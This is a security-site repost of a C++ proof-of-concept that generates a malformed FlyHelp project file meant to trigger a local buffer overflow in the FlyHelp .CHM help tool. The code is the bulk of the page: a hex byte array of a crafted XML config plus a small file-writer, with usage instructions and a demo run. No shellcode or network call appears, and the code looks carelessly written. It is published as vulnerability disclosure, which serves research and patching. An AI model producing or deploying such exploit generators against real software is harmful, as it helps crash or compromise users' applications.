首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FlyHelp (.CHM File) Local Buffer Overflow PoC
来源:www.vfcocus.net 作者:fl0_fl0w 发布时间:2009-07-22  
/*
<<Name >>flyhelp.cpp
FlyHelp .CHM File Buffer Overflo POC
<<Credits >>fl0 fl0w
<<Website >>http://www.sploitz.10001mb.com
*/

/*
<<DEMO >>
C:\Documents and Settings\Stefan\Desktop\New Folder1>flyhelp.exe

C:\Documents and Settings\Stefan\Desktop\New Folder1>flyhelp.exe -file test

***************************************************************************
FlyHelp .CHM File Buffer Overflo POC
        Usage is flyhelp.exe -file filename
Credits fl0 fl0w
***************************************************************************
File build !

*/
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

char rawData[1471] =
{
    0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31,
    0x2E, 0x30, 0x22, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x57, 0x69,
    0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2D, 0x31, 0x32, 0x35, 0x32, 0x22, 0x20, 0x3F, 0x3E, 0x0D, 0x0A,
    0x3C, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E, 0x3C, 0x69, 0x6E, 0x66, 0x6F,
    0x3E, 0x43, 0x48, 0x4D, 0x20, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x3C, 0x2F, 0x69, 0x6E,
    0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x56, 0x65, 0x72, 0x73, 0x69,
    0x6F, 0x6E, 0x22, 0x3E, 0x32, 0x30, 0x38, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20,
    0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20,
    0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F,
    0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22,
    0x46, 0x69, 0x6C, 0x65, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
    0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F,
    0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E,
    0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x48, 0x50, 0x22,
    0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F,
    0x6E, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54,
    0x69, 0x74, 0x6C, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C,
    0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x74, 0x6F, 0x70,
    0x69, 0x63, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20,
    0x6E, 0x3D, 0x22, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x22, 0x3E, 0x30, 0x78, 0x34,
    0x30, 0x39, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D,
    0x22, 0x46, 0x75, 0x6C, 0x6C, 0x2D, 0x74, 0x65, 0x78, 0x74, 0x20, 0x73, 0x65, 0x61, 0x72, 0x63,
    0x68, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
    0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4D, 0x61,
    0x69, 0x6E, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
    0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x5B, 0x38, 0x30, 0x2C, 0x36, 0x30,
    0x2C, 0x36, 0x34, 0x30, 0x2C, 0x34, 0x38, 0x30, 0x5D, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x72, 0x65, 0x50, 0x6F,
    0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4E, 0x61, 0x76, 0x69, 0x67, 0x61, 0x74,
    0x69, 0x6F, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E,
    0x74, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x74, 0x65, 0x6D, 0x70, 0x2E, 0x68,
    0x68, 0x63, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
    0x3D, 0x22, 0x49, 0x6E, 0x64, 0x65, 0x78, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
    0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53,
    0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
    0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x64, 0x76,
    0x53, 0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F,
    0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x61,
    0x76, 0x6F, 0x72, 0x69, 0x74, 0x65, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
    0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44,
    0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x54, 0x61, 0x62, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54, 0x61, 0x62, 0x73,
    0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x53,
    0x68, 0x6F, 0x77, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x42, 0x61, 0x63, 0x6B,
    0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64,
    0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x70, 0x42, 0x75, 0x74,
    0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C,
    0x70, 0x20, 0x6E, 0x3D, 0x22, 0x52, 0x65, 0x66, 0x72, 0x65, 0x73, 0x68, 0x42, 0x75, 0x74, 0x74,
    0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
    0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E,
    0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
    0x50, 0x72, 0x69, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
    0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74,
    0x69, 0x6F, 0x6E, 0x73, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4C, 0x6F, 0x63, 0x61,
    0x74, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x42, 0x75,
    0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70,
    0x31, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x22, 0x3E,
    0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
    0x4A, 0x75, 0x6D, 0x70, 0x31, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F,
    0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75,
    0x6D, 0x70, 0x32, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32,
    0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
    0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E,
    0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
    0x4E, 0x65, 0x78, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x72, 0x65, 0x76,
    0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x79, 0x6E, 0x63,
    0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
    0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x68, 0x6F, 0x77, 0x48, 0x69, 0x64, 0x65, 0x50, 0x61,
    0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
    0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x43, 0x61,
    0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x64, 0x50, 0x61,
    0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
    0x20, 0x6E, 0x3D, 0x22, 0x50, 0x61, 0x6E, 0x65, 0x57, 0x69, 0x64, 0x74, 0x68, 0x22, 0x3E, 0x3C,
    0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
    0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67,
    0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E,
} ;

class EXPLOIT {
public:

int check (char *, char *);
void Usage (char *);
};

static int  Poz = 1;
static int  Neg = 0;
 
int i;     

char Name [SIZE];   
char NeWbuff [SIZE];
                                           

                                                  int main (int argc, char *argv [])                                                                                          

{
        
        EXPLOIT VIDEO;
         VIDEO.Usage(argv [0]);
         if(argc < 2) {
            VIDEO.Usage(argv [0]);     
            exit(0);    
            }
          if(VIDEO.check(argv [1], "-file") == Neg) {
             fprintf(stdout , " Incorect input ");
             printf(" \t..Usage is %s -file filename.. \n", Name);
             exit(0);
             }
        FILE *f;
        strcpy(Name, argv [2]);
        strcat(Name, " .chm ");
        f = fopen (Name, "w");
        assert( f != NULL);
        strncpy(NeWbuff  , rawData , sizeof(rawData));
        fputs("FILE \"", f);
        fprintf( f, " %s ", NeWbuff);
        fprintf( stdout , "File build ! ");
        exit(0); 
       getchar();
return 0;       
                                                  }
     int EXPLOIT::check(char *Arg_, char *_Arg)
   {
       if(strcmp(Arg_, _Arg) == 0)
        return Poz;
      return Neg;
        }  
    void EXPLOIT::Usage(char *Name)
   {
     system("cls");   
     printf("***************************************************************************\n");
     printf("FlyHelp .CHM File Buffer Overflo POC\n");
     printf(" \tUsage is %s -file filename\n", Name);   
     fprintf(stdout , "Credits fl0 fl0w\n");
      printf("***************************************************************************\n");
         }  
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WINMOD 1.4 (.lst File) Local B
·Adobe Acrobat 9.1.2 NOS Local
·MS Office Web Components Sprea
·Php168 v6 权限提升漏洞
·otsAV 1.77.001 (.ofl File) Loc
·DD-WRT (httpd service) Remote
·WINMOD 1.4 (.lst) Universal Bu
·KMplayer <= 2.9.4.1433 (.srt F
·Soritong MP3 Player 1.0 (SKIN)
·Streaming Audio Player 0.9 (sk
·Mozilla Firefox 3.5 (Font tags
·Acoustica MP3 Audio Mixer 2.47
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved